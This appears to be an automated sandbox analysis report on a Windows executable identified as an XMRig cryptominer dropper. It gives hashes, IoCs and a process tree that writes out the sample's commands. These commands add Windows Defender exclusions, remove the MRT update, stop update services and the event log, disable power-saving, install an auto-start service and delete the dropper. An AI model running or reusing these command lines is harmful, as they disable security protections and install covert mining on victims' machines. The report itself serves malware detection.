Analysis
-
max time kernel
120s -
max time network
115s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe
Resource
win7-20240903-en
General
-
Target
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe
-
Size
5.6MB
-
MD5
4d2fd9b3ddadb332c994815e57fa2dbe
-
SHA1
c089f6ebf51c6bc8b39defcc824eab69ba039332
-
SHA256
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867
-
SHA512
4775e037c4a55265f9580cf9fc4cef1f48e8d38be41c869277ee1ba89ae385847e2f7363c7ff2255294ee03d5938c81ee75da96d93bfb3be2a842154d0e6f988
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/H3:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgT
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
Processes:
resource yara_rule behavioral1/memory/804-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/804-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/804-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/804-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/804-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/804-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/804-34-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/804-41-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid Process 2772 powershell.exe 832 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 1584 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
fqwofdtexigy.exepid Process 480 1872 fqwofdtexigy.exe -
Loads dropped DLL 1 IoCs
Processes:
pid Process 480 -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid Process 2388 powercfg.exe 2212 powercfg.exe 1828 powercfg.exe 3012 powercfg.exe 3016 powercfg.exe 1856 powercfg.exe 1676 powercfg.exe 2208 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
fqwofdtexigy.exepowershell.exeb543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exepowershell.exedescription ioc Process File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
fqwofdtexigy.exedescription pid Process procid_target PID 1872 set thread context of 3020 1872 fqwofdtexigy.exe 86 PID 1872 set thread context of 804 1872 fqwofdtexigy.exe 89 -
Processes:
resource yara_rule behavioral1/memory/804-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-40-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-34-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/804-41-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 2980 sc.exe 1936 sc.exe 376 sc.exe 1748 sc.exe 2132 sc.exe 1764 sc.exe 2216 sc.exe 1980 sc.exe 2652 sc.exe 2596 sc.exe 2964 sc.exe 2408 sc.exe 984 sc.exe 2264 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1097ec8ff13adb01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exepowershell.exefqwofdtexigy.exepowershell.exenslookup.exepid Process 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 2772 powershell.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3028 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1872 fqwofdtexigy.exe 832 powershell.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 1872 fqwofdtexigy.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe 804 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exenslookup.exedescription pid Process Token: SeDebugPrivilege 2772 powershell.exe Token: SeShutdownPrivilege 1828 powercfg.exe Token: SeShutdownPrivilege 2212 powercfg.exe Token: SeShutdownPrivilege 2388 powercfg.exe Token: SeShutdownPrivilege 2208 powercfg.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeShutdownPrivilege 1676 powercfg.exe Token: SeShutdownPrivilege 3016 powercfg.exe Token: SeShutdownPrivilege 3012 powercfg.exe Token: SeShutdownPrivilege 1856 powercfg.exe Token: SeLockMemoryPrivilege 804 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
cmd.execmd.execmd.exefqwofdtexigy.exedescription pid Process procid_target PID 2560 wrote to memory of 2540 2560 cmd.exe 38 PID 2560 wrote to memory of 2540 2560 cmd.exe 38 PID 2560 wrote to memory of 2540 2560 cmd.exe 38 PID 1584 wrote to memory of 2860 1584 cmd.exe 63 PID 1584 wrote to memory of 2860 1584 cmd.exe 63 PID 1584 wrote to memory of 2860 1584 cmd.exe 63 PID 2348 wrote to memory of 572 2348 cmd.exe 71 PID 2348 wrote to memory of 572 2348 cmd.exe 71 PID 2348 wrote to memory of 572 2348 cmd.exe 71 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 3020 1872 fqwofdtexigy.exe 86 PID 1872 wrote to memory of 804 1872 fqwofdtexigy.exe 89 PID 1872 wrote to memory of 804 1872 fqwofdtexigy.exe 89 PID 1872 wrote to memory of 804 1872 fqwofdtexigy.exe 89 PID 1872 wrote to memory of 804 1872 fqwofdtexigy.exe 89 PID 1872 wrote to memory of 804 1872 fqwofdtexigy.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe"C:\Users\Admin\AppData\Local\Temp\b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3028 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2540
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2652
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2964
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1764
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:2216
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:1936
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:1748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2860
-
-
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:572
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2980
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:984
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2264
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2132
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3020
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD54d2fd9b3ddadb332c994815e57fa2dbe
SHA1c089f6ebf51c6bc8b39defcc824eab69ba039332
SHA256b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867
SHA5124775e037c4a55265f9580cf9fc4cef1f48e8d38be41c869277ee1ba89ae385847e2f7363c7ff2255294ee03d5938c81ee75da96d93bfb3be2a842154d0e6f988